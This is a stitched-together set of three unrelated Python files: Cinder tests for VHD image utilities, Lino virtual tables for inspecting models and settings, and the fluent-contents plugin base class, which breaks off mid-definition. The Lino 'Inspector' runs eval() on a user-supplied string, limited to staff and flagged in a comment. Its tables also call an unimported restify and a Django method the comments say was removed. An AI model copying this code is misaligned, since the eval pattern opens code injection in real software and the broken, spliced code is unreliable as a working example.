        self.assertIsNone(result)

    @mock.patch('cinder.image.image_utils.set_vhd_parent')
    def test_fix_vhd_chain(self, mock_set_parent):
        # Each VHD in the chain gets its successor set as its parent.
        chain = (mock.sentinel.first,
                 mock.sentinel.second,
                 mock.sentinel.third,
                 mock.sentinel.fourth,
                 mock.sentinel.fifth)
        result = image_utils.fix_vhd_chain(chain)
        self.assertIsNone(result)
        mock_set_parent.assert_has_calls(
            [mock.call(a, b) for a, b in zip(chain, chain[1:])])

    @mock.patch('cinder.image.image_utils.utils.execute',
                return_value=(98765.43210, mock.sentinel.error))
    def test_get_vhd_size(self, mock_exec):
        # The float reported by `vhd-util query` is truncated to an int.
        path = mock.sentinel.vhd_path
        result = image_utils.get_vhd_size(path)
        mock_exec.assert_called_once_with('vhd-util', 'query', '-n', path,
                                          '-v')
        self.assertEqual(98765, result)

    @mock.patch('cinder.image.image_utils.utils.execute')
    def test_resize_vhd(self, mock_exec):
        path = mock.sentinel.vhd_path
        new_size = 387549349
        journal_file = mock.sentinel.journal
        result = image_utils.resize_vhd(path, new_size, journal_file)
        self.assertIsNone(result)
        mock_exec.assert_called_once_with('vhd-util', 'resize', '-n', path,
                                          '-s', str(new_size), '-j',
                                          journal_file)

    @mock.patch('cinder.image.image_utils.utils.execute')
    def test_coalesce_vhd(self, mock_exec):
        path = mock.sentinel.vhd_path
        result = image_utils.coalesce_vhd(path)
        self.assertIsNone(result)
        mock_exec.assert_called_once_with('vhd-util', 'coalesce', '-n', path)

    @mock.patch('cinder.image.image_utils.coalesce_vhd')
    @mock.patch('cinder.image.image_utils.resize_vhd')
    @mock.patch('cinder.image.image_utils.get_vhd_size')
    @mock.patch('cinder.image.image_utils.utils.execute')
    def test_coalesce_chain(self, mock_exec, mock_size, mock_resize,
                            mock_coal):
        # All links but the last are coalesced into their child (which is
        # resized first); the tail of the chain is returned.
        chain = (mock.sentinel.first,
                 mock.sentinel.second,
                 mock.sentinel.third,
                 mock.sentinel.fourth,
                 mock.sentinel.fifth)
        result = image_utils.coalesce_chain(chain)
        self.assertEqual(mock.sentinel.fifth, result)
        mock_size.assert_has_calls([mock.call(vhd) for vhd in chain[:-1]])
        mock_resize.assert_has_calls(
            [mock.call(vhd, mock_size.return_value, mock.ANY)
             for vhd in chain[1:]])
        mock_coal.assert_has_calls([mock.call(vhd) for vhd in chain[:-1]])

    @mock.patch('cinder.image.image_utils.os.path')
    def test_discover_vhd_chain(self, mock_path):
        # Files 0.vhd, 1.vhd, ... are collected until the first gap.
        directory = '/some/test/directory'
        mock_path.join.side_effect = lambda x, y: '/'.join((x, y))
        mock_path.exists.side_effect = (True, True, True, False)
        result = image_utils.discover_vhd_chain(directory)
        self.assertEqual(['/some/test/directory/0.vhd',
                          '/some/test/directory/1.vhd',
                          '/some/test/directory/2.vhd'], result)

    @mock.patch('cinder.image.image_utils.temporary_dir')
    @mock.patch('cinder.image.image_utils.os.rename')
    @mock.patch('cinder.image.image_utils.fileutils.delete_if_exists')
    @mock.patch('cinder.image.image_utils.coalesce_chain')
    @mock.patch('cinder.image.image_utils.fix_vhd_chain')
    @mock.patch('cinder.image.image_utils.discover_vhd_chain')
    @mock.patch('cinder.image.image_utils.extract_targz')
    def test_replace_xenserver_image_with_coalesced_vhd(
            self, mock_targz, mock_discover, mock_fix, mock_coal, mock_delete,
            mock_rename, mock_temp):
        # The image is untarred into a temp dir, its VHD chain repaired and
        # coalesced, and the coalesced result moved over the original file.
        image_file = mock.sentinel.image_file
        tmp = mock_temp.return_value.__enter__.return_value
        result = image_utils.replace_xenserver_image_with_coalesced_vhd(
            image_file)
        self.assertIsNone(result)
        mock_targz.assert_called_once_with(image_file, tmp)
        mock_discover.assert_called_once_with(tmp)
        mock_fix.assert_called_once_with(mock_discover.return_value)
        mock_coal.assert_called_once_with(mock_discover.return_value)
        mock_delete.assert_called_once_with(image_file)
        mock_rename.assert_called_once_with(mock_coal.return_value, image_file)
class TestCreateTemporaryFile(test.TestCase):
    """Tests for image_utils.create_temporary_file()."""

    @mock.patch('cinder.image.image_utils.os.close')
    @mock.patch('cinder.image.image_utils.CONF')
    @mock.patch('cinder.image.image_utils.os.path.exists')
    @mock.patch('cinder.image.image_utils.os.makedirs')
    @mock.patch('cinder.image.image_utils.tempfile.mkstemp')
    def test_create_temporary_file_no_dir(self, mock_mkstemp, mock_dirs,
                                          mock_path, mock_conf, mock_close):
        # Without image_conversion_dir configured, mkstemp falls back to
        # the system default temp directory (dir=None).
        mock_conf.image_conversion_dir = None
        mock_mkstemp.return_value = (mock.sentinel.file_descriptor,
                                     mock.sentinel.absolute_pathname)
        result = image_utils.create_temporary_file()
        self.assertEqual(mock.sentinel.absolute_pathname, result)
        mock_mkstemp.assert_called_once_with(dir=None)
        mock_close.assert_called_once_with(mock.sentinel.file_descriptor)

    @mock.patch('cinder.image.image_utils.os.close')
    @mock.patch('cinder.image.image_utils.CONF')
    @mock.patch('cinder.image.image_utils.os.path.exists', return_value=True)
    @mock.patch('cinder.image.image_utils.os.makedirs')
    @mock.patch('cinder.image.image_utils.tempfile.mkstemp')
    def test_create_temporary_file_with_dir(self, mock_mkstemp, mock_dirs,
                                            mock_path, mock_conf, mock_close):
        # An already existing conversion directory is used as-is.
        conv_dir = mock.sentinel.image_conversion_dir
        mock_conf.image_conversion_dir = conv_dir
        mock_mkstemp.return_value = (mock.sentinel.file_descriptor,
                                     mock.sentinel.absolute_pathname)
        result = image_utils.create_temporary_file()
        self.assertEqual(mock.sentinel.absolute_pathname, result)
        self.assertFalse(mock_dirs.called)
        mock_mkstemp.assert_called_once_with(dir=conv_dir)
        mock_close.assert_called_once_with(mock.sentinel.file_descriptor)

    @mock.patch('cinder.image.image_utils.os.close')
    @mock.patch('cinder.image.image_utils.CONF')
    @mock.patch('cinder.image.image_utils.os.path.exists', return_value=False)
    @mock.patch('cinder.image.image_utils.os.makedirs')
    @mock.patch('cinder.image.image_utils.tempfile.mkstemp')
    def test_create_temporary_file_and_dir(self, mock_mkstemp, mock_dirs,
                                           mock_path, mock_conf, mock_close):
        # A missing conversion directory is created before mkstemp runs.
        conv_dir = mock.sentinel.image_conversion_dir
        mock_conf.image_conversion_dir = conv_dir
        mock_mkstemp.return_value = (mock.sentinel.file_descriptor,
                                     mock.sentinel.absolute_pathname)
        result = image_utils.create_temporary_file()
        self.assertEqual(mock.sentinel.absolute_pathname, result)
        mock_dirs.assert_called_once_with(conv_dir)
        mock_mkstemp.assert_called_once_with(dir=conv_dir)
        mock_close.assert_called_once_with(mock.sentinel.file_descriptor)
class TestTemporaryFileContextManager(test.TestCase):
    """Tests for the image_utils.temporary_file() context manager."""

    @mock.patch('cinder.image.image_utils.create_temporary_file',
                return_value=mock.sentinel.temporary_file)
    @mock.patch('cinder.image.image_utils.fileutils.delete_if_exists')
    def test_temporary_file(self, mock_delete, mock_create):
        # The file must survive for the duration of the with-block and be
        # deleted exactly once afterwards.
        with image_utils.temporary_file() as tmp_name:
            self.assertEqual(mock.sentinel.temporary_file, tmp_name)
            self.assertFalse(mock_delete.called)
        mock_delete.assert_called_once_with(mock.sentinel.temporary_file)
|
|
# Copyright 2012-2020 Rumma & Ko Ltd
# License: GNU Affero General Public License v3 (see file COPYING for details)
import re
from html import escape
import types
import datetime
from etgen.html import E
from django.db import models
from django.conf import settings
from lino.utils.report import EmptyTable
from lino.utils import AttrDict
from lino.core.utils import get_models
from lino.utils.code import codefiles, SourceFile
from lino.utils import join_elems
from lino.api import rt, dd, _
# from .mixins import Searchable
from .roles import SiteSearcher
from .choicelists import TimeZones
class Models(dd.VirtualTable):
    """Virtual table listing every Django model known to this site."""
    label = _("Models")
    # column_defaults = dict(width=8)
    # column_names = "app name verbose_name docstring rows"
    column_names = "app name fields #docstring tables rows detail_action_column"
    detail_layout = """
    app name docstring rows
    about.FieldsByModel
    """
    display_mode = 'html'

    @classmethod
    def get_data_rows(self, ar):
        # Yield every installed model; no per-user filtering is applied.
        # user_type = ar.get_user().user_type
        for model in get_models():
            if True:
                # print model
                yield model

    @classmethod
    def summary_row(cls, ar, obj, **kw):
        return [str(obj._meta.verbose_name_plural)]

    @dd.displayfield(_("app_label"))
    def app(self, obj, ar):
        return obj._meta.app_label

    @dd.displayfield(_("name"))
    def name(self, obj, ar):
        return obj.__name__

    @dd.displayfield(_("Detail Action"))
    def detail_action_column(self, obj, ar):
        # Empty cell for models whose default table has no detail action.
        if obj.get_default_table().detail_action is None:
            return ''
        return obj.get_default_table().detail_action.full_name()

    @dd.displayfield(_("Tables"))
    def tables(self, obj, ar):
        # tables = obj._lino_slaves.values()
        def fmt(tbl):
            # The "href" is the dotted path of the table class, not a real
            # URL -- presumably resolved by the renderer; TODO confirm.
            url = tbl.__module__ + '.' + tbl.__name__
            return E.a(tbl.__name__, href=url)
        return join_elems([fmt(tbl) for tbl in obj._lino_tables])
        # return obj.get_default_table().detail_action.full_name()

    # @dd.displayfield(_("verbose name"))
    # def vebose_name(self,obj,ar):
    #     return unicode(obj._meta.vebose_name)

    @dd.displayfield(_("docstring"))
    def docstring(self, obj, ar):
        return obj.__doc__
        # return restify(unicode(obj.__doc__))

    @dd.requestfield(_("Rows"))
    def rows(self, obj, ar):
        # A request on the model's default table, i.e. a clickable row count.
        return obj.get_default_table().request(
            user=ar.get_user(), renderer=ar.renderer)

    @dd.displayfield(_("Fields"))
    def fields(self, obj, ar):
        return ' '.join([f.name for f in obj._meta.get_fields()])
class FieldsByModel(dd.VirtualTable):
    """Virtual table showing the database fields of a master model."""
    label = _("Fields")
    # master_key = "model"
    # master = Models
    column_names = "name verbose_name help_text_column"

    @classmethod
    def get_data_rows(self, ar):
        # NOTE(review): Model._meta.get_fields_with_model() was removed in
        # Django 1.10 -- confirm the Django version this is meant to run on.
        model = ar.master_instance
        if model:
            for (fld, remote) in model._meta.get_fields_with_model():
                yield fld

    @dd.displayfield(_("name"))
    def name(self, fld, ar):
        return fld.name

    @dd.displayfield(_("verbose name"))
    def verbose_name(self, fld, ar):
        # BUGFIX: was ``fld.vebose_name`` (typo), which raised
        # AttributeError for every rendered row.
        return str(fld.verbose_name)

    @dd.displayfield(_("help text"))
    def help_text_column(self, obj, ar):
        # NOTE(review): ``restify`` is not imported in this module --
        # presumably ``from lino.utils.restify import restify``; verify.
        # return obj.__doc__
        return restify(str(obj.help_text))
class Inspected(object):
    """One row of the :class:`Inspector` table.

    Stores the container object, the access prefix (``'.'`` for attribute
    access, ``''`` for subscripting), the member name and its value.
    """

    def __init__(self, parent, prefix, name, value):
        self.parent, self.prefix = parent, prefix
        self.name, self.value = name, value
class Inspector(dd.VirtualTable):
    """
    Shows a simplistic "inspector" which once helped me for debugging.
    Needs more work to become seriously useful...
    """
    label = _("Inspector")
    required_roles = dd.login_required(dd.SiteStaff)
    column_names = "i_name i_type i_value"
    parameters = dict(
        inspected=models.CharField(
            _("Inspected object"), max_length=100, blank=True),
        show_callables=models.BooleanField(_("show callables"), default=False)
    )
    params_layout = 'inspected show_callables'
    # editable = False
    # display_mode = 'html'

    @classmethod
    def get_inspected(self, name):
        """Resolve *name* as an attribute path below ``settings``.

        Returns ``settings`` itself for an empty name.  On failure the
        exception object is returned (not raised) so it can be displayed.
        """
        # SECURITY NOTE: eval() on a user-supplied string.  Access is
        # limited to staff via required_roles, but this must never be
        # exposed to untrusted users.
        if not name:
            return settings
        try:
            o = eval('settings.' + name)
        except Exception as e:
            o = e
        return o

    @classmethod
    def get_data_rows(self, ar):
        """Yield :class:`Inspected` rows for the currently inspected object."""
        if ar.param_values.show_callables:
            def flt(v):
                return True
        else:
            def flt(v):
                # BUGFIX: the original listed ``types.UnboundMethodType``
                # (twice), which does not exist in Python 3 -- this module
                # is Python 3 only (see the ``html.escape`` import) -- and
                # would raise AttributeError.  ``types.MethodType`` covers
                # bound methods instead.
                if isinstance(v, (
                        types.FunctionType,
                        types.GeneratorType,
                        types.MethodType,
                        types.BuiltinMethodType,
                        types.BuiltinFunctionType)):
                    return False
                return True
        o = self.get_inspected(ar.param_values.inspected)
        if isinstance(o, (list, tuple)):
            for i, v in enumerate(o):
                yield Inspected(o, '', "[" + str(i) + "]", v)
        elif isinstance(o, AttrDict):
            for k, v in list(o.items()):
                yield Inspected(o, '.', k, v)
        elif isinstance(o, dict):
            for k, v in list(o.items()):
                yield Inspected(o, '', "[" + repr(k) + "]", v)
        elif isinstance(o, type) and issubclass(o, models.Model):
            for fld in o._meta.get_fields():
                yield Inspected(o, '', fld.name, fld)
        else:
            # Generic fallback: walk dir(), honouring the quick search and
            # the show_callables filter; dunder names are always hidden.
            for k in dir(o):
                if k.startswith('__'):
                    continue
                if ar.quick_search and (
                        ar.quick_search.lower() not in k.lower()):
                    continue
                v = getattr(o, k)
                if flt(v):
                    yield Inspected(o, '.', k, v)

    @dd.displayfield(_("Name"))
    def i_name(self, obj, ar):
        # Builds the would-be next "inspected" path; the navigation request
        # itself is currently disabled, only the plain name is shown.
        pv = dict()
        if ar.param_values.inspected:
            pv.update(inspected=ar.param_values.inspected +
                      obj.prefix + obj.name)
        else:
            pv.update(inspected=obj.name)
        # newreq = ar.spawn_request(param_values=pv)
        # return ar.href_to_request(newreq, obj.name)
        return obj.name

    @dd.displayfield(_("Value"))
    def i_value(self, obj, ar):
        return escape(str(obj.value), quote=False)

    @dd.displayfield(_("Type"))
    def i_type(self, obj, ar):
        return escape(str(type(obj.value)), quote=False)
class SourceFiles(dd.VirtualTable):
    """Lists Lino source files together with their code/doc line counts."""
    label = _("Source files")
    column_names = 'module_name code_lines doc_lines'

    @classmethod
    def get_data_rows(self, ar):
        # Wrap each (name, filename) pair found below the lino* packages.
        for modname, path in codefiles('lino*'):
            yield SourceFile(modname, path)

    @dd.virtualfield(models.CharField(_("module name")))
    def module_name(self, obj, ar):
        return obj.modulename

    @dd.virtualfield(models.IntegerField(_("Code")))
    def code_lines(self, obj, ar):
        return obj.count_code

    @dd.virtualfield(models.IntegerField(_("doc")))
    def doc_lines(self, obj, ar):
        return obj.count_doc
|
|
"""
Internal module for the plugin system,
the API is exposed via __init__.py
"""
from django.http import HttpResponseRedirect, HttpResponsePermanentRedirect
from future.builtins import str
from future.utils import with_metaclass
from django.conf import settings
from django.contrib import admin
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.core import context_processors
from django.contrib.auth import context_processors as auth_context_processors
from django.contrib.messages import context_processors as messages_context_processors
from django.core.cache import cache
from django.db import DatabaseError
from django.forms import Media, MediaDefiningClass
from django.template.context import Context
from django.template.loader import render_to_string
from django.utils.html import linebreaks, escape
from django.utils.translation import ugettext as _, get_language
from fluent_contents.cache import get_rendering_cache_key, get_placeholder_cache_key
from fluent_contents.forms import ContentItemForm
from fluent_contents.models import ContentItemOutput, ImmutableMedia, DEFAULT_TIMEOUT
# Some standard request processors to use in the plugins,
# Naturally, you want STATIC_URL to be available in plugins.
def _add_debug(request):
    # Expose the DEBUG flag to plugin templates, mirroring Django's debug
    # context processor but without its INTERNAL_IPS restriction.
    return dict(debug=settings.DEBUG)
# The context processors applied to every PluginContext.  This mirrors what
# RequestContext would provide (request, STATIC/MEDIA URLs, csrf, i18n,
# auth and messages) plus the local debug flag above.
_STANDARD_REQUEST_CONTEXT_PROCESSORS = (
    context_processors.request,
    context_processors.static,
    context_processors.csrf,
    context_processors.media,
    context_processors.i18n,
    auth_context_processors.auth,
    messages_context_processors.messages,
    _add_debug,
)
class PluginContext(Context):
    """
    A template Context comparable to :class:`~django.template.context.RequestContext`,
    pre-filled with the standard request data so that variables such as
    ``STATIC_URL`` and ``request`` are available in plugin templates.
    """

    def __init__(self, request, dict=None, current_app=None):
        # Site-global context processors for plugins could be hooked in
        # here, should a use case for them ever arise.
        super(PluginContext, self).__init__(dict, current_app=current_app)
        for proc in _STANDARD_REQUEST_CONTEXT_PROCESSORS:
            self.update(proc(request))
def frontend_media_property(cls):
    """Build a ``frontend_media`` property for *cls*.

    Works like Django's ``media_property`` but reads the ``FrontendMedia``
    inner class, and avoids creating Media objects when nothing is declared.
    """
    def _frontend_media(self):
        # Start from the parent class' frontend_media, if it has one.
        try:
            base = super(cls, self).frontend_media
        except AttributeError:
            base = ImmutableMedia.empty_instance
        declaration = getattr(cls, 'FrontendMedia', None)
        if not declaration:
            return base
        media = Media(declaration)
        # Not supporting extend=('js',) here, not documented in Django either.
        if getattr(declaration, 'extend', True) and base is not ImmutableMedia.empty_instance:
            return base + media
        return media
    return property(_frontend_media)
class PluginMediaDefiningClass(MediaDefiningClass):
    """Metaclass for classes that can carry a ``FrontendMedia`` definition."""

    def __new__(cls, name, bases, attrs):
        new_class = super(PluginMediaDefiningClass, cls).__new__(cls, name, bases, attrs)
        # Only synthesize the property when a FrontendMedia declaration is
        # present and no explicit frontend_media attribute overrides it.
        wants_property = 'FrontendMedia' in attrs and 'frontend_media' not in attrs
        if wants_property:
            new_class.frontend_media = frontend_media_property(new_class)
        return new_class
class ContentPlugin(with_metaclass(PluginMediaDefiningClass, object)):
    """
    The base class for all content plugins.

    A plugin defines the rendering for a :class:`~fluent_contents.models.ContentItem`,
    settings and presentation in the admin interface.
    To create a new plugin, derive from this class and call
    :func:`plugin_pool.register <PluginPool.register>` to enable it.
    For example:

    .. code-block:: python

        from fluent_contents.extensions import plugin_pool, ContentPlugin

        @plugin_pool.register
        class AnnouncementBlockPlugin(ContentPlugin):
            model = AnnouncementBlockItem
            render_template = "plugins/announcementblock.html"
            category = _("Simple blocks")

    As minimal configuration, specify the :attr:`model` and :attr:`render_template` fields.
    The :attr:`model` should be a subclass of the :class:`~fluent_contents.models.ContentItem` model class.

    .. note::
       When the plugin is registered in the :attr:`plugin_pool`, it will be instantiated only once.
       It is therefore not possible to store per-request state at the plugin object.
       This is similar to the behavior of the :class:`~django.contrib.admin.ModelAdmin` classes in Django.

    To customize the admin, the :attr:`admin_form_template` and :attr:`form` can be defined.
    Some well known properties of the :class:`~django.contrib.admin.ModelAdmin` class can also be specified on plugins;
    such as:

    * :attr:`~django.contrib.admin.ModelAdmin.fieldsets`
    * :attr:`~django.contrib.admin.ModelAdmin.filter_horizontal`
    * :attr:`~django.contrib.admin.ModelAdmin.filter_vertical`
    * :attr:`~django.contrib.admin.ModelAdmin.prepopulated_fields`
    * :attr:`~django.contrib.admin.ModelAdmin.radio_fields`
    * :attr:`~django.contrib.admin.ModelAdmin.raw_id_fields`
    * :attr:`~django.contrib.admin.ModelAdmin.readonly_fields`
    * A ``class Media`` to provide extra CSS and JavaScript files for the admin interface.

    The rendered output of a plugin is cached by default, assuming that most content is static.
    This also avoids extra database queries to retrieve the model objects.
    In case the plugin needs to output content dynamically, include ``cache_output = False`` in the plugin definition.
    """
    # -- Settings to override:

    #: The model to use, must derive from :class:`fluent_contents.models.ContentItem`.
    model = None

    #: The form to use in the admin interface. By default it uses a :class:`fluent_contents.models.ContentItemForm`.
    form = ContentItemForm

    #: The template to render the admin interface with
    admin_form_template = "admin/fluent_contents/contentitem/admin_form.html"

    #: An optional template which is included in the admin interface, to initialize components (e.g. JavaScript)
    admin_init_template = None

    #: The fieldsets for the admin view.
    fieldsets = None

    #: The template to render the frontend HTML output.
    render_template = None

    #: By default, rendered output is cached, and updated on admin changes.
    cache_output = True

    #: .. versionadded:: 0.9
    #: Cache the plugin output per :django:setting:`SITE_ID`.
    cache_output_per_site = False

    #: .. versionadded:: 1.0
    #: Cache the plugin output per language.
    #: This can be useful for sites which either:
    #:
    #: * Display fallback content on pages, but still use ``{% trans %}`` inside templates.
    #: * Dynamically switch the language per request, and *share* content between multiple languages.
    #:
    #: This option does not have to be used for translated CMS pages,
    #: as each page can have it's own set of :class:`~fluent_contents.models.ContentItem` objects.
    #: It's only needed for rendering the *same* item in different languages.
    cache_output_per_language = False

    #: .. versionadded: 1.0
    #: Set a custom cache timeout value
    cache_timeout = DEFAULT_TIMEOUT

    #: .. versionadded:: 1.0
    #: Tell which languages the plugin will cache.
    #: It defaults to the language codes from the :django:setting:`LANGUAGES` setting.
    #: NOTE: the list comprehension rebinds ``_`` at class scope, shadowing
    #: the imported ``ugettext`` alias for the remainder of the class body.
    cache_supported_language_codes = [code for code, _ in settings.LANGUAGES]

    #: The category title to place the plugin into.
    #: This is only used for the "Add Plugin" menu.
    category = None

    #: .. versionadded:: 1.0
    #: By default, the plugin is rendered in the :attr:`language_code` it's written in.
    #: It can be disabled explicitly in case the content should be rendered language agnostic.
    #: For plugins that cache output per language, this will be done already.
    #:
    #: See also: :attr:`cache_output_per_language`
    render_ignore_item_language = False

    #: Alternative template for the view.
    ADMIN_TEMPLATE_WITHOUT_LABELS = "admin/fluent_contents/contentitem/admin_form_without_labels.html"

    #: .. versionadded:: 0.8.5
    #: The ``HORIZONTAL`` constant for the :attr:`radio_fields`.
    HORIZONTAL = admin.HORIZONTAL

    #: .. versionadded:: 0.8.5
    #: The ``VERTICAL`` constant for the :attr:`radio_fields`.
    VERTICAL = admin.VERTICAL

    #: The fields to display as raw ID
    raw_id_fields = ()

    #: The fields to display in a vertical filter
    filter_vertical = ()

    #: The fields to display in a horizontal filter
    filter_horizontal = ()

    #: The fields to display as radio choice. For example::
    #:
    #:    radio_fields = {
    #:        'align': ContentPlugin.VERTICAL,
    #:    }
    #:
    #: The value can be :attr:`ContentPlugin.HORIZONTAL` or :attr:`ContentPlugin.VERTICAL`.
    radio_fields = {}

    #: Fields to automatically populate with values
    prepopulated_fields = {}

    #: Overwritten formfield attributes, e.g. the 'widget'. Allows both the class and fieldname as key.
    formfield_overrides = {}

    #: The fields to display as readonly.
    readonly_fields = ()

    def __init__(self):
        # Lazily resolved ContentType id cache, see :attr:`type_id`.
        self._type_id = None

    def __repr__(self):
        return '<{0} for {1} model>'.format(self.__class__.__name__, self.model.__name__)

    @property
    def verbose_name(self):
        """
        The title for the plugin, by default it reads the ``verbose_name`` of the model.
        """
        return self.model._meta.verbose_name

    @property
    def name(self):
        """
        Return the classname of the plugin, this is mainly provided for templates.
        This value can also be used in :func:`PluginPool`.
        """
        return self.__class__.__name__

    @property
    def type_name(self):
        """
        Return the classname of the model, this is mainly provided for templates.
        """
        return self.model.__name__

    @property
    def type_id(self):
        """
        Shortcut to retrieving the ContentType id of the model.
        """
        if self._type_id is None:
            try:
                self._type_id = ContentType.objects.get_for_model(self.model).id
            except DatabaseError as e:
                raise DatabaseError("Unable to fetch ContentType object, is a plugin being registered before the initial syncdb? (original error: {0})".format(str(e)))
        return self._type_id

    def get_model_instances(self):
        """
        Return the model instances the plugin has created.
        """
        return self.model.objects.all()

    def _render_contentitem(self, request, instance):
        # Internal wrapper for render(), to allow updating the method signature easily.
        # It also happens to really simplify code navigation.
        result = self.render(request=request, instance=instance)
        if isinstance(result, ContentItemOutput):
            # Return in new 1.0 format
            # Also include the statically declared FrontendMedia, inserted before any extra added files.
            # These could be included already in the ContentItemOutput object, but duplicates are removed.
            media = self.get_frontend_media(instance)
            if media is not ImmutableMedia.empty_instance:
                result._insert_media(media)
            return result
        elif isinstance(result, (HttpResponseRedirect, HttpResponsePermanentRedirect)):
            # Can't return a HTTP response from a plugin that is rendered as a string in a template.
            # However, this response can be translated into our custom exception-based redirect mechanism.
            return self.redirect(result['Location'], result.status_code)
        else:
            # Old 0.9 syntax, wrap it.
            # The 'cacheable' is implied in the rendering already, but this is just for completeness.
            media = self.get_frontend_media(instance)
            return ContentItemOutput(result, media, cacheable=self.cache_output, cache_timeout=self.cache_timeout)

    def get_output_cache_base_key(self, placeholder_name, instance):
        """
        .. versionadded:: 1.0
        Return the default cache key, both :func:`get_output_cache_key` and :func:`get_output_cache_keys` rely on this.
        By default, this function generates the cache key using :func:`~fluent_contents.cache.get_rendering_cache_key`.
        """
        return get_rendering_cache_key(placeholder_name, instance)

    def get_output_cache_key(self, placeholder_name, instance):
        """
        .. versionadded:: 0.9
        Return the default cache key which is used to store a rendered item.
        By default, this function generates the cache key using :func:`get_output_cache_base_key`.
        """
        cachekey = self.get_output_cache_base_key(placeholder_name, instance)
        if self.cache_output_per_site:
            cachekey = "{0}-s{1}".format(cachekey, settings.SITE_ID)
        # Append language code
        if self.cache_output_per_language:
            # NOTE: Not using self.language_code, but using the current language instead.
            #       That is what the {% trans %} tags are rendered as after all.
            #       The render_placeholder() code can switch the language if needed.
            user_language = get_language()
            if user_language not in self.cache_supported_language_codes:
                user_language = 'unsupported'
            cachekey = "{0}.{1}".format(cachekey, user_language)
        return cachekey

    def get_output_cache_keys(self, placeholder_name, instance):
        """
        .. versionadded:: 0.9
        Return the possible cache keys for a rendered item.

        This method should be overwritten when implementing a function :func:`set_cached_output` method
        or when implementing a :func:`get_output_cache_key` function.
        By default, this function generates the cache key using :func:`get_output_cache_base_key`.
        """
        base_key = self.get_output_cache_base_key(placeholder_name, instance)
        cachekeys = [
            base_key,
        ]
        if self.cache_output_per_site:
            site_ids = list(Site.objects.values_list('pk', flat=True))
            if settings.SITE_ID not in site_ids:
                site_ids.append(settings.SITE_ID)
            base_key = get_rendering_cache_key(placeholder_name, instance)
            cachekeys = ["{0}-s{1}".format(base_key, site_id) for site_id in site_ids]
        if self.cache_output_per_language or self.render_ignore_item_language:
            # Append language code to all keys,
            # have to invalidate a lot more items in memcache.
            # Also added "None" suffix, since get_parent_language_code() may return that.
            # TODO: ideally for render_ignore_item_language, only invalidate all when the fallback language changed.
            total_list = []
            cache_languages = list(self.cache_supported_language_codes) + ['unsupported', 'None']
            # All variants of the Placeholder (for full page caching)
            placeholder = instance.placeholder
            total_list.extend(get_placeholder_cache_key(placeholder, lc) for lc in cache_languages)
            # All variants of the ContentItem in different languages
            for user_language in cache_languages:
                total_list.extend("{0}.{1}".format(base, user_language) for base in cachekeys)
            cachekeys = total_list
        return cachekeys

    def get_cached_output(self, placeholder_name, instance):
        """
        .. versionadded:: 0.9
        Return the cached output for a rendered item, or ``None`` if no output is cached.

        This method can be overwritten to implement custom caching mechanisms.
        By default, this function generates the cache key using :func:`get_output_cache_key`
        and retrieves the results from the configured Django cache backend (e.g. memcached).
        """
        cachekey = self.get_output_cache_key(placeholder_name, instance)
        return cache.get(cachekey)

    def set_cached_output(self, placeholder_name, instance, output):
        """
        .. versionadded:: 0.9
        Store the cached output for a rendered item.

        This method can be overwritten to implement custom caching mechanisms.
        By default, this function generates the cache key using :func:`~fluent_contents.cache.get_rendering_cache_key`
        and stores the results in the configured Django cache backend (e.g. memcached).

        When custom cache keys are used, also include those in :func:`get_output_cache_keys`
        so the cache will be cleared when needed.

        .. versionchanged:: 1.0
           The received data is no longer a HTML string, but :class:`~fluent_contents.models.ContentItemOutput` object.
        """
        cachekey = self.get_output_cache_key(placeholder_name, instance)
        if self.cache_timeout is not DEFAULT_TIMEOUT:
            cache.set(cachekey, output, self.cache_timeout)
        else:
            # Don't want to mix into the default 0/None issue.
            cache.set(cachekey, output)

    def render(self, request, instance, **kwargs):
        """
        The rendering/view function that displays a plugin model instance.

        :param instance: An instance of the ``model`` the plugin uses.
        :param request: The Django :class:`~django.http.HttpRequest` class containing the request parameters.
        :param kwargs: An optional slot for any new parameters.

        To render a plugin, either override this function, or specify the :attr:`render_template` variable,
        and optionally override :func:`get_context`.
        It is recommended to wrap the output in a ``<div>`` tag,
        to prevent the item from being displayed right next to the previous plugin.

        .. versionadded:: 1.0
           The function may either return a string of HTML code,
           or return a :class:`~fluent_contents.models.ContentItemOutput` object
           which holds both the CSS/JS includes and HTML string.
           For the sake of convenience and simplicity, most examples
           only return a HTML string directly.

           When the user needs to be redirected, simply return a :class:`~django.http.HttpResponseRedirect`
           or call the :func:`redirect` method.

        To render raw HTML code, use :func:`~django.utils.safestring.mark_safe` on the returned HTML.
        """
        render_template = self.get_render_template(request, instance, **kwargs)
        if not render_template:
            return str(_(u"{No rendering defined for class '%s'}" % self.__class__.__name__))
        context = self.get_context(request, instance, **kwargs)
        return self.render_to_string(request, render_template, context)

    def render_to_string(self, request, template, context, content_instance=None):
        """
        Render a custom template with the :class:`~PluginContext` as context instance.
        """
        if not content_instance:
            content_instance = PluginContext(request)
        return render_to_string(template, context, context_instance=content_instance)

    def render_error(self, error):
        """
        A default implementation to render an exception.
        """
        return '<div style="color: red; border: 1px solid red; padding: 5px;">' \
               '<p><strong>%s</strong></p>%s</div>' % (_('Error:'), linebreaks(escape(str(error))))

    def redirect(self, url, status=302):
        """
        .. versionadded:: 1.0
        Request a redirect to be performed for the user.
        Usage example:

        .. code-block:: python

            def get_context(self, request, instance, **kwargs):
                context = super(IdSearchPlugin, self).get_context(request, instance, **kwargs)
                if request.method == "POST":
                    form = MyForm(request.POST)
                    if form.is_valid():
                        self.redirect("/foo/")
                else:
                    form = MyForm()
                context['form'] = form
                return context

        To handle redirects, :class:`fluent_contents.middleware.HttpRedirectRequestMiddleware`
        should be added to the :django:setting:`MIDDLEWARE_CLASSES`.
        """
        # Raises rather than returns: the middleware converts the exception
        # into a real HTTP redirect response.
        raise HttpRedirectRequest(url, status=status)

    def get_render_template(self, request, instance, **kwargs):
        """
        Return the template to render for the specific model `instance` or `request`,
        By default it uses the ``render_template`` attribute.
        """
        return self.render_template

    def get_context(self, request, instance, **kwargs):
        """
        Return the context to use in the template defined by ``render_template`` (or :func:`get_render_template`).
        By default, it returns the model instance as ``instance`` field in the template.
        """
        return {
            'instance': instance,
        }

    @property
    def frontend_media(self):
        """
        .. versionadded:: 1.0
        The frontend media, typically declared using a ``class FrontendMedia`` definition.
        """
        # By adding this property, frontend_media_property() is further optimized.
        return ImmutableMedia.empty_instance

    def get_frontend_media(self, instance):
        """
        Return the frontend media for a specific instance.
        By default, it returns ``self.frontend_media``, which derives
        from the ``class FrontendMedia`` of the plugin.
        """
        return self.frontend_media
class HttpRedirectRequest(Exception):
    """
    .. versionadded:: 1.0
